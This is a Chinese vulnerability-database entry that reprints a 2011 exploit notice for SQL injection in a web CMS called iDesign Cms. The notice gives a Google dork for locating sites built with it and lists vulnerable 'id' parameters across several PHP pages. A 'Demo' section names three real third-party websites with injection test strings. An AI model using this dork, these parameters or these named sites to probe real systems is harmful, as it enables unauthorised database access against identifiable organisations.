iDesign Cms Remote Sql Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1048872 漏洞类型
发布时间 2011-08-12 更新时间 2011-08-12
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2011080076
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###### Archieve an Resource About Hacking ####

# Exploit Title: iDesign Cms Remote Sql Injection Vulnerability

# Author: Netrondoank Aka netron

# home Page: http://www.ilmuhacker.org

# Forum : http://www.indonesiansecurity.info

# Vendor or Software Link: http://www.idesigninc.net/

# Version: N/A

# Category:: webapps

# Google dork: "Design by: iDesign"

# Tested on: Linux Back Track 5



####################################################################

#  Proof Of Concept [POC]



https://site/view_product.php?id=[Sqli]

http://site/ourPortfolio.php?id=[Sqli]

http://site/features.php?id=[Sqli]

http://site/view_news.php?id=[Sqli]

http://site/event.php?id=[Sqli]

http://site/view_news.php?id=[Sqli]

http://site/store.php?id=[Sqli]

http://site/features.php?id=[Sqli]

http://site/store.php?id=[Sqli]

####################################################################
# Demo

http://www.connico.com/ourPortfolio.php?id=%274
http://aacdhq.org/features.php?id=%273
http://www.opheliafordtn.com/view_news.php?id='37

####################################################################
#Lets Join in My crew in http://indonesiansecurity.info. Indonesian security Advisories.




#########################################################################################

#Greetz To:

Allah swt .free dom For Palestine .Indonesiansecurity.info, 1337day.com

packetstormsecurity.org, Exploit-id.com ,securityreason.com ,securityfocus.com

##########################################################################################

###############################  Archieve an Resource About Hacking--Ilmuhackerdotorg ####